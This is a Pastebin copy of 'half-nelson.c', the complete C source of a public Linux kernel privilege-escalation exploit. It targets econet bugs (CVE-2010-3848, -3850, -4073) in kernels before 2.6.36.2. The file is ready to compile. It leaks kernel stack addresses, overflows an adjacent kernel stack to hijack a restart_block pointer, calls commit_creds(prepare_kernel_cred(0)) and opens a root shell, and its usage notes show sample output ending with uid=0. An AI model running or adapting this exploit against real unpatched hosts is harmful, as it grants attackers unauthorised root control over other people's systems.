Advertisement
unknowns-mm

half-nelson.c

Sep 30th, 2016
37
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.29 KB | None | 0 0
  1. /*
  2. * half-nelson.c
  3. *
  4. * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit
  5. * Jon Oberheide <jon@oberheide.org>
  6. * http://jon.oberheide.org
  7. *
  8. * Information:
  9. *
  10. * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848
  11. *
  12. * Stack-based buffer overflow in the econet_sendmsg function in
  13. * net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an
  14. * econet address is configured, allows local users to gain privileges by
  15. * providing a large number of iovec structures.
  16. *
  17. * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850
  18. *
  19. * The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel
  20. * before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which
  21. * allows local users to bypass intended access restrictions and configure
  22. * econet addresses via an SIOCSIFADDR ioctl call.
  23. *
  24. * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073
  25. *
  26. * The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not
  27. * initialize certain structures, which allows local users to obtain
  28. * potentially sensitive information from kernel stack memory.
  29. *
  30. * Usage:
  31. *
  32. * $ gcc half-nelson.c -o half-nelson -lrt
  33. * $ ./half-nelson
  34. * [+] looking for symbols...
  35. * [+] resolved symbol commit_creds to 0xffffffff81088ad0
  36. * [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0
  37. * [+] resolved symbol ia32_sysret to 0xffffffff81046692
  38. * [+] spawning children to achieve adjacent kstacks...
  39. * [+] found parent kstack at 0xffff88001c6ca000
  40. * [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000
  41. * [+] lower child spawning a helper...
  42. * [+] lower child calling compat_sys_wait4 on helper...
  43. * [+] helper going to sleep...
  44. * [+] upper child triggering stack overflow...
  45. * [+] helper woke up
  46. * [+] lower child returned from compat_sys_wait4
  47. * [+] parent's restart_block has been clobbered
  48. * [+] escalating privileges...
  49. * [+] launching root shell!
  50. * # id
  51. * uid=0(root) gid=0(root)
  52. *
  53. * Notes:
  54. *
  55. * This exploit leverages three vulnerabilities to escalate privileges.
  56. * The primary vulnerability is a kernel stack overflow, not a stack buffer
  57. * overflow as the CVE description incorrectly states. I believe this is the
  58. * first public exploit for a kernel stack overflow, and it turns out to be
  59. * a bit tricky due to some particulars of the econet vulnerability. A full
  60. * breakdown of the exploit is forthcoming.
  61. *
  62. * Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).
  63. */
  64.  
  65. #include <stdio.h>
  66. #include <stdlib.h>
  67. #include <stdint.h>
  68. #include <stddef.h>
  69. #include <string.h>
  70. #include <unistd.h>
  71. #include <errno.h>
  72. #include <fcntl.h>
  73. #include <limits.h>
  74. #include <syscall.h>
  75. #include <inttypes.h>
  76. #include <sys/types.h>
  77. #include <sys/socket.h>
  78. #include <sys/wait.h>
  79. #include <sys/ioctl.h>
  80. #include <sys/mman.h>
  81. #include <sys/ipc.h>
  82. #include <sys/sem.h>
  83. #include <sys/stat.h>
  84. #include <sys/mman.h>
  85. #include <sys/resource.h>
  86. #include <sys/syscall.h>
  87. #include <sys/utsname.h>
  88. #include <netinet/in.h>
  89. #include <net/if.h>
  90.  
  91. #define IOVS 446
  92. #define NPROC 1024
  93. #define KSTACK_SIZE 8192
  94.  
  95. #define KSTACK_UNINIT 0
  96. #define KSTACK_UPPER 1
  97. #define KSTACK_LOWER 2
  98. #define KSTACK_DIE 3
  99. #define KSTACK_PARENT 4
  100. #define KSTACK_CLOBBER 5
  101.  
  102. #define LEAK_BASE 0xffff880000000000
  103. #define LEAK_TOP 0xffff8800c0000000
  104. #define LEAK_DEPTH 500
  105. #define LEAK_OFFSET 32
  106.  
  107. #define NR_IPC 0x75
  108. #define NR_WAIT4 0x72
  109. #define SEMCTL 0x3
  110.  
  111. #ifndef PF_ECONET
  112. #define PF_ECONET 19
  113. #endif
  114.  
  115. #define STACK_OFFSET 6
  116. #define RESTART_OFFSET 40
  117.  
  118. struct ec_addr {
  119. unsigned char station;
  120. unsigned char net;
  121. };
  122.  
  123. struct sockaddr_ec {
  124. unsigned short sec_family;
  125. unsigned char port;
  126. unsigned char cb;
  127. unsigned char type;
  128. struct ec_addr addr;
  129. unsigned long cookie;
  130. };
  131.  
  132. struct ipc64_perm {
  133. uint32_t key;
  134. uint32_t uid;
  135. uint32_t gid;
  136. uint32_t cuid;
  137. uint32_t cgid;
  138. uint32_t mode;
  139. uint16_t seq;
  140. uint16_t __pad2;
  141. unsigned long __unused1;
  142. unsigned long __unused2;
  143. };
  144.  
  145. struct semid64_ds {
  146. struct ipc64_perm sem_perm;
  147. unsigned long sem_otime;
  148. unsigned long __unused1;
  149. unsigned long sem_ctime;
  150. unsigned long __unused;
  151. unsigned long sem_nsems;
  152. unsigned long __unused3;
  153. unsigned long __unused4;
  154. };
  155.  
  156. union semun {
  157. int val;
  158. struct semid_ds *buf;
  159. unsigned short *array;
  160. struct seminfo *__buf;
  161. };
  162.  
  163. struct region {
  164. unsigned long parent;
  165. unsigned long addrs[NPROC];
  166. };
  167. struct region *region;
  168.  
  169. typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
  170. typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
  171. _commit_creds commit_creds;
  172. _prepare_kernel_cred prepare_kernel_cred;
  173. unsigned long ia32_sysret;
  174.  
  175. void __attribute__((regparm(3)))
  176. kernel_code(void)
  177. {
  178. commit_creds(prepare_kernel_cred(0));
  179. }
  180.  
  181. void
  182. payload_parent(void)
  183. {
  184. asm volatile (
  185. "mov $kernel_code, %rax\n"
  186. "call *%rax\n"
  187. );
  188. }
  189.  
  190. void
  191. payload_child(void)
  192. {
  193. asm volatile (
  194. "movq $payload_parent, (%0)\n"
  195. "jmpq *%1\n"
  196. :
  197. : "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret)
  198. );
  199. }
  200.  
  201. unsigned long
  202. get_kstack(void)
  203. {
  204. int i, size, offset;
  205. union semun *arg;
  206. struct semid_ds dummy;
  207. struct semid64_ds *leaked;
  208. char *stack_start, *stack_end;
  209. unsigned char *p;
  210. unsigned long kstack, *ptr;
  211.  
  212. /* make sure our argument is 32-bit accessible */
  213. arg = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
  214. if (arg == MAP_FAILED) {
  215. printf("[-] failure mapping memory, aborting!\n");
  216. exit(1);
  217. }
  218.  
  219. /* map a fake stack to use during syscall */
  220. stack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
  221. if (stack_start == MAP_FAILED) {
  222. printf("[-] failure mapping memory, aborting!\n");
  223. exit(1);
  224. }
  225. stack_end = stack_start + 4096;
  226.  
  227. memset(arg, 0, sizeof(union semun));
  228. memset(&dummy, 0, sizeof(struct semid_ds));
  229. arg->buf = &dummy;
  230.  
  231. /* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */
  232. asm volatile (
  233. "push %%rax\n"
  234. "push %%rbx\n"
  235. "push %%rcx\n"
  236. "push %%rdx\n"
  237. "push %%rsi\n"
  238. "push %%rdi\n"
  239. "movl %0, %%eax\n"
  240. "movl %1, %%ebx\n"
  241. "movl %2, %%ecx\n"
  242. "movl %3, %%edx\n"
  243. "movl %4, %%esi\n"
  244. "movq %5, %%rdi\n"
  245. "movq %%rsp, %%r8\n"
  246. "movq %6, %%rsp\n"
  247. "push %%r8\n"
  248. "int $0x80\n"
  249. "pop %%r8\n"
  250. "movq %%r8, %%rsp\n"
  251. "pop %%rdi\n"
  252. "pop %%rsi\n"
  253. "pop %%rdx\n"
  254. "pop %%rcx\n"
  255. "pop %%rbx\n"
  256. "pop %%rax\n"
  257. :
  258. : "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)
  259. : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"
  260. );
  261.  
  262. /* naively extract a pointer to the kstack from the kstack */
  263. p = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;
  264. kstack = *(unsigned long *) p;
  265.  
  266. if (kstack < LEAK_BASE || kstack > LEAK_TOP) {
  267. printf("[-] failed to leak a suitable kstack address, try again!\n");
  268. exit(1);
  269. }
  270. if ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {
  271. printf("[-] failed to leak a suitable kstack address, try again!\n");
  272. exit(1);
  273. }
  274.  
  275. kstack = kstack & ~0x1fff;
  276.  
  277. return kstack;
  278. }
  279.  
  280. unsigned long
  281. get_symbol(char *name)
  282. {
  283. FILE *f;
  284. unsigned long addr;
  285. char dummy;
  286. char sname[512];
  287. struct utsname ver;
  288. int ret;
  289. int rep = 0;
  290. int oldstyle = 0;
  291.  
  292. f = fopen("/proc/kallsyms", "r");
  293. if (f == NULL) {
  294. f = fopen("/proc/ksyms", "r");
  295. if (f == NULL)
  296. goto fallback;
  297. oldstyle = 1;
  298. }
  299.  
  300. repeat:
  301. ret = 0;
  302. while(ret != EOF) {
  303. if (!oldstyle)
  304. ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
  305. else {
  306. ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
  307. if (ret == 2) {
  308. char *p;
  309. if (strstr(sname, "_O/") || strstr(sname, "_S."))
  310. continue;
  311. p = strrchr(sname, '_');
  312. if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
  313. p = p - 4;
  314. while (p > (char *)sname && *(p - 1) == '_')
  315. p--;
  316. *p = '\0';
  317. }
  318. }
  319. }
  320. if (ret == 0) {
  321. fscanf(f, "%s\n", sname);
  322. continue;
  323. }
  324. if (!strcmp(name, sname)) {
  325. fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
  326. fclose(f);
  327. return addr;
  328. }
  329. }
  330.  
  331. fclose(f);
  332. if (rep)
  333. return 0;
  334. fallback:
  335. /* didn't find the symbol, let's retry with the System.map
  336. dedicated to the pointlessness of Russell Coker's SELinux
  337. test machine (why does he keep upgrading the kernel if
  338. "all necessary security can be provided by SE Linux"?)
  339. */
  340. uname(&ver);
  341. if (strncmp(ver.release, "2.6", 3))
  342. oldstyle = 1;
  343. sprintf(sname, "/boot/System.map-%s", ver.release);
  344. f = fopen(sname, "r");
  345. if (f == NULL)
  346. return 0;
  347. rep = 1;
  348. goto repeat;
  349. }
  350. int
  351. get_adjacent_kstacks(void)
  352. {
  353. int i, ret, shm, pid, type;
  354.  
  355. /* create shared communication channel between parent and its children */
  356. shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);
  357. if (shm < 0) {
  358. printf("[-] failed creating shared memory, aborting!\n");
  359. exit(1);
  360. }
  361.  
  362. ret = ftruncate(shm, sizeof(struct region));
  363. if (ret != 0) {
  364. printf("[-] failed resizing shared memory, aborting!\n");
  365. exit(1);
  366. }
  367.  
  368. region = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
  369. memset(region, KSTACK_UNINIT, sizeof(struct region));
  370.  
  371. /* parent kstack self-discovery */
  372. region->parent = get_kstack();
  373.  
  374. printf("[+] found parent kstack at 0x%lx\n", region->parent);
  375.  
  376. /* fork and discover children with adjacently-allocated kernel stacks */
  377. for (i = 0; i < NPROC; ++i) {
  378. pid = fork();
  379.  
  380. if (pid > 0) {
  381. type = KSTACK_PARENT;
  382. continue;
  383. } else if (pid == 0) {
  384. /* children do kstack self-discovery */
  385. region->addrs[i] = get_kstack();
  386.  
  387. /* children sleep until parent has found adjacent children */
  388. while (1) {
  389. sleep(1);
  390. if (region->addrs[i] == KSTACK_DIE) {
  391. /* parent doesn't need us :-( */
  392. exit(0);
  393. } else if (region->addrs[i] == KSTACK_UPPER) {
  394. /* we're the upper adjacent process */
  395. type = KSTACK_UPPER;
  396. break;
  397. } else if (region->addrs[i] == KSTACK_LOWER) {
  398. /* we're the lower adjacent process */
  399. type = KSTACK_LOWER;
  400. break;
  401. }
  402. }
  403. break;
  404. } else {
  405. printf("[-] fork failed, aborting!\n");
  406. exit(1);
  407. }
  408. }
  409.  
  410. return type;
  411. }
  412.  
  413. void
  414. do_parent(void)
  415. {
  416. int i, j, upper, lower;
  417.  
  418. /* parent sleeps until we've discovered all the child kstacks */
  419. while (1) {
  420. sleep(1);
  421. for (i = 0; i < NPROC; ++i) {
  422. if (region->addrs[i] == KSTACK_UNINIT) {
  423. break;
  424. }
  425. }
  426. if (i == NPROC) {
  427. break;
  428. }
  429. }
  430.  
  431. /* figure out if we have any adjacent child kstacks */
  432. for (i = 0; i < NPROC; ++i) {
  433. for (j = 0; j < NPROC; ++j) {
  434. if (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {
  435. break;
  436. }
  437. }
  438. if (j != NPROC) {
  439. break;
  440. }
  441. }
  442. if (i == NPROC && j == NPROC) {
  443. printf("[-] failed to find adjacent kstacks, try again!\n");
  444. exit(1);
  445. }
  446.  
  447. upper = i;
  448. lower = j;
  449.  
  450. printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\n", region->addrs[lower], region->addrs[upper]);
  451.  
  452. /* signal to non-adjacent children to die */
  453. for (i = 0; i < NPROC; ++i) {
  454. if (i != upper && i != lower) {
  455. region->addrs[i] = KSTACK_DIE;
  456. }
  457. }
  458.  
  459. /* signal adjacent children to continue on */
  460. region->addrs[upper] = KSTACK_UPPER;
  461. region->addrs[lower] = KSTACK_LOWER;
  462.  
  463. /* parent sleeps until child has clobbered the fptr */
  464. while (1) {
  465. sleep(1);
  466. if (region->parent == KSTACK_CLOBBER) {
  467. break;
  468. }
  469. }
  470.  
  471. printf("[+] escalating privileges...\n");
  472.  
  473. /* trigger our clobbered fptr */
  474. syscall(__NR_restart_syscall);
  475.  
  476. /* our privileges should be escalated now */
  477. if (getuid() != 0) {
  478. printf("[-] privilege escalation failed, aborting!\n");
  479. exit(1);
  480. }
  481.  
  482. printf("[+] launching root shell!\n");
  483.  
  484. execl("/bin/sh", "/bin/sh", NULL);
  485. }
  486.  
  487. void
  488. do_child_upper(void)
  489. {
  490. int i, ret, eco_sock;
  491. struct sockaddr_ec eco_addr;
  492. struct msghdr eco_msg;
  493. struct iovec iovs[IOVS];
  494. struct ifreq ifr;
  495. char *target;
  496.  
  497. /* calculate payload target, skip prologue */
  498. target = (char *) payload_child;
  499. target += 4;
  500.  
  501. /* give lower child a chance to enter its wait4 call */
  502. sleep(1);
  503.  
  504. /* write some zeros */
  505. for (i = 0; i < STACK_OFFSET; ++i) {
  506. iovs[i].iov_base = (void *) 0x0;
  507. iovs[i].iov_len = 0;
  508. }
  509.  
  510. /* overwrite saved ia32_sysret address on stack */
  511. iovs[STACK_OFFSET].iov_base = (void *) target;
  512. iovs[STACK_OFFSET].iov_len = 0x0246;
  513.  
  514. /* force abort via EFAULT */
  515. for (i = STACK_OFFSET + 1; i < IOVS; ++i) {
  516. iovs[i].iov_base = (void *) 0xffffffff00000000;
  517. iovs[i].iov_len = 0;
  518. }
  519.  
  520. /* create econet socket */
  521. eco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);
  522. if (eco_sock < 0) {
  523. printf("[-] failed creating econet socket, aborting!\n");
  524. exit(1);
  525. }
  526.  
  527. memset(&ifr, 0, sizeof(ifr));
  528. strcpy(ifr.ifr_name, "lo");
  529.  
  530. /* trick econet into associated with the loopback */
  531. ret = ioctl(eco_sock, SIOCSIFADDR, &ifr);
  532. if (ret != 0) {
  533. printf("[-] failed setting interface address, aborting!\n");
  534. exit(1);
  535. }
  536.  
  537. memset(&eco_addr, 0, sizeof(eco_addr));
  538. memset(&eco_msg, 0, sizeof(eco_msg));
  539. eco_msg.msg_name = &eco_addr;
  540. eco_msg.msg_namelen = sizeof(eco_addr);
  541. eco_msg.msg_flags = 0;
  542. eco_msg.msg_iov = &iovs[0];
  543. eco_msg.msg_iovlen = IOVS;
  544.  
  545. printf("[+] upper child triggering stack overflow...\n");
  546.  
  547. /* trigger the kstack overflow into lower child's kstack */
  548. ret = sendmsg(eco_sock, &eco_msg, 0);
  549. if (ret != -1 || errno != EFAULT) {
  550. printf("[-] sendmsg succeeded unexpectedly, aborting!\n");
  551. exit(1);
  552. }
  553.  
  554. close(eco_sock);
  555. }
  556.  
  557. void
  558. do_child_lower(void)
  559. {
  560. int pid;
  561.  
  562. printf("[+] lower child spawning a helper...\n");
  563.  
  564. /* fork off a helper to wait4 on */
  565. pid = fork();
  566. if (pid == 0) {
  567. printf("[+] helper going to sleep...\n");
  568. sleep(5);
  569. printf("[+] helper woke up\n");
  570. exit(1);
  571. }
  572.  
  573. printf("[+] lower child calling compat_sys_wait4 on helper...\n");
  574.  
  575. /* syscall(NR_WAIT4, pid, 0, 0, 0) */
  576. asm volatile (
  577. "push %%rax\n"
  578. "push %%rbx\n"
  579. "push %%rcx\n"
  580. "push %%rdx\n"
  581. "push %%rsi\n"
  582. "movl %0, %%eax\n"
  583. "movl %1, %%ebx\n"
  584. "movl %2, %%ecx\n"
  585. "movl %3, %%edx\n"
  586. "movl %4, %%esi\n"
  587. "int $0x80\n"
  588. "pop %%rsi\n"
  589. "pop %%rdx\n"
  590. "pop %%rcx\n"
  591. "pop %%rbx\n"
  592. "pop %%rax\n"
  593. :
  594. : "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)
  595. : "memory", "rax", "rbx", "rcx", "rdx", "rsi"
  596. );
  597.  
  598. printf("[+] lower child returned from compat_sys_wait4\n");
  599.  
  600. printf("[+] parent's restart_block has been clobbered\n");
  601.  
  602. /* signal parent that our fptr should now be clobbered */
  603. region->parent = KSTACK_CLOBBER;
  604. }
  605.  
  606. int
  607. main(int argc, char **argv)
  608. {
  609. int type;
  610.  
  611. if (sizeof(unsigned long) != 8) {
  612. printf("[-] x86_64 only, sorry!\n");
  613. exit(1);
  614. }
  615.  
  616. printf("[+] looking for symbols...\n");
  617.  
  618. commit_creds = (_commit_creds) get_symbol("commit_creds");
  619. if (!commit_creds) {
  620. printf("[-] symbol table not available, aborting!\n");
  621. exit(1);
  622. }
  623.  
  624. prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
  625. if (!prepare_kernel_cred) {
  626. printf("[-] symbol table not available, aborting!\n");
  627. exit(1);
  628. }
  629.  
  630. ia32_sysret = get_symbol("ia32_sysret");
  631. if (!ia32_sysret) {
  632. printf("[-] symbol table not available, aborting!\n");
  633. exit(1);
  634. }
  635.  
  636. printf("[+] spawning children to achieve adjacent kstacks...\n");
  637.  
  638. type = get_adjacent_kstacks();
  639.  
  640. if (type == KSTACK_PARENT) {
  641. do_parent();
  642. } else if (type == KSTACK_UPPER) {
  643. do_child_upper();
  644. } else if (type == KSTACK_LOWER) {
  645. do_child_lower();
  646. }
  647.  
  648. return 0;
  649. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement